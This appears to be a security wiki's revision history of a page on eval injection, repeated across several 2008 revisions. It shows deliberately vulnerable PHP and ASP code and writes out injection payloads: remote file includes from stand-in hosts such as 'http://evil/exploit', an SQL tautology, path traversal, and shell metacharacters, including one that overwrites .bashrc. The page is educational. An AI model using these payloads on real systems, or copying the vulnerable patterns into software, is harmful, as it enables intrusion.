==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:Staff]]

==Related [[Attacks]]==

*[[Server-Side Includes (SSI) Injection | Server Side Includes]]
*[[ Direct Dynamic Code Evaluation ('Eval Injection')]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

* http://www.seclab.tuwien.ac.at/advisories/TUVSA-0510-001.txt

* http://marc.info/?l=bugtraq&m=105379741528925&w=2

* http://archives.neohapsis.com/archives/bugtraq/2005-06/0002.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-02T11:14:47Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:Staff]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-01T17:13:27Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:outsider]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-01T17:13:08Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:outsider]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

* [[Category:Injection]]
[[Category:Attack]]

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-01T17:12:15Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:outsider]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-01T17:10:31Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:outsider]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[Vulnerability 1]]
* [[Vulnerabiltiy 2]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-01T17:07:36Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
